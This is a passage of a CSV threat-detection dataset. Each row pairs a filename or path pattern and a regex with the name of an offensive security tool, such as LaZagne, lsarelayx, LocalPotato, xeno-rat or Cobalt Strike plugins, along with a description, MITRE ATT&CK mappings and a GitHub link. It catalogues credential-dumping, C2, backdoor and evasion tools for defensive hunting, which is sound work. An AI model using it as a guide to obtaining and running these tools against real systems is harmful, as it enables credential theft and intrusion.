assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\LAPSDumper\*",".{0,1000}\\LAPSDumper\\.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*\lastpass\getCredslastpassEntries.h*",".{0,1000}\\lastpass\\getCredslastpassEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\lastpass\getCredslastpassMasterPass.h*",".{0,1000}\\lastpass\\getCredslastpassMasterPass\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\lastpass\getCredslastpassMasterUsername.h*",".{0,1000}\\lastpass\\getCredslastpassMasterUsername\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\lateral_wmi.py*",".{0,1000}\\lateral_wmi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\lazagne.exe*",".{0,1000}\\lazagne\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\LaZagne.py*",".{0,1000}\\LaZagne\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\lazagne.zip*",".{0,1000}\\lazagne\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\ldap_search_bof.py*",".{0,1000}\\ldap_search_bof\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*\ldap-checker.py*",".{0,1000}\\ldap\-checker\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\ldapper.py*",".{0,1000}\\ldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*\LDAPPER-master*",".{0,1000}\\LDAPPER\-master.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*\ldapph.db*",".{0,1000}\\ldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*\ldap-search.py*",".{0,1000}\\ldap\-search\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\ldapsearch-ad.py*",".{0,1000}\\ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\LdrLockLiberator.c*",".{0,1000}\\LdrLockLiberator\.c.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*\LdrLockLiberatorWDK.c*",".{0,1000}\\LdrLockLiberatorWDK\.c.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*\letmein.ps1*",".{0,1000}\\letmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\lfs_injection.exe*",".{0,1000}\\lfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\liblsarelay.dll*",".{0,1000}\\liblsarelay\.dll.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\liblsarelayx.dll*",".{0,1000}\\liblsarelayx\.dll.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\LibSnaffle*",".{0,1000}\\LibSnaffle.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","0","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*\Lime-Crypter.sln*",".{0,1000}\\Lime\-Crypter\.sln.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*\Lime-Crypter\*",".{0,1000}\\Lime\-Crypter\\.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*\LinikatzV2\*",".{0,1000}\\LinikatzV2\\.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*\LiveMicrophone.dll*",".{0,1000}\\LiveMicrophone\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\lnk_parser_cmd.exe -r *",".{0,1000}\\lnk_parser_cmd\.exe\s\-r\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Lnk2Pwn.java*",".{0,1000}\\Lnk2Pwn\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*\Lnk2PwnFrame.java*",".{0,1000}\\Lnk2PwnFrame\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*\lnk2pwn-master*",".{0,1000}\\lnk2pwn\-master.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*\lnkbomb.py*",".{0,1000}\\lnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*\lnkbomb-1.0\*",".{0,1000}\\lnkbomb\-1\.0\\.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*\Lnk-Sweeper.ps1*",".{0,1000}\\Lnk\-Sweeper\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Lnk-Sweeper.txt*",".{0,1000}\\Lnk\-Sweeper\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\LNKUp\generate.py*",".{0,1000}\\LNKUp\\generate\.py.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*\loader.x64.exe*",".{0,1000}\\loader\.x64\.exe.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*\Loader\Loader.csproj*",".{0,1000}\\Loader\\Loader\.csproj.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*\Local\Temp\logins.log*",".{0,1000}\\Local\\Temp\\logins\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\local_admins.csv*",".{0,1000}\\local_admins\.csv.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\local_execution_linux.exe*",".{0,1000}\\local_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\local_map.exe*",".{0,1000}\\local_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\local_thread_hijacking.exe*",".{0,1000}\\local_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\LocalAdminAccess.txt*",".{0,1000}\\LocalAdminAccess\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\LocalAdminSharp.sln*",".{0,1000}\\LocalAdminSharp\.sln.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*\localbrute.ps1*",".{0,1000}\\localbrute\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\LocalPotato\*.cpp*",".{0,1000}\\LocalPotato\\.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*\LocalPotato\*.exe*",".{0,1000}\\LocalPotato\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*\LocalPrivEsc\*",".{0,1000}\\LocalPrivEsc\\.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\LocalShellExtParse.py*",".{0,1000}\\LocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*\LocalShellExtParse-master*",".{0,1000}\\LocalShellExtParse\-master.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*\LockLess.exe*",".{0,1000}\\LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\loginAAD.ps1*",".{0,1000}\\loginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\logon_backdoor\*",".{0,1000}\\logon_backdoor\\.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\logon_backdoor-master*",".{0,1000}\\logon_backdoor\-master.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\LogonScreen.exe*",".{0,1000}\\LogonScreen\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*\lolbin.exe*",".{0,1000}\\lolbin\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*\LOLSpoof.nim*",".{0,1000}\\LOLSpoof\.nim.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*\LOLSpoof\*",".{0,1000}\\LOLSpoof\\.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*\lookup-sid.py*",".{0,1000}\\lookup\-sid\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\looneypwner.sh*",".{0,1000}\\looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*\lsarelayx.cpp*",".{0,1000}\\lsarelayx\.cpp.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\lsarelayx.csproj*",".{0,1000}\\lsarelayx\.csproj.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\lsarelayx.sln*",".{0,1000}\\lsarelayx\.sln.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" 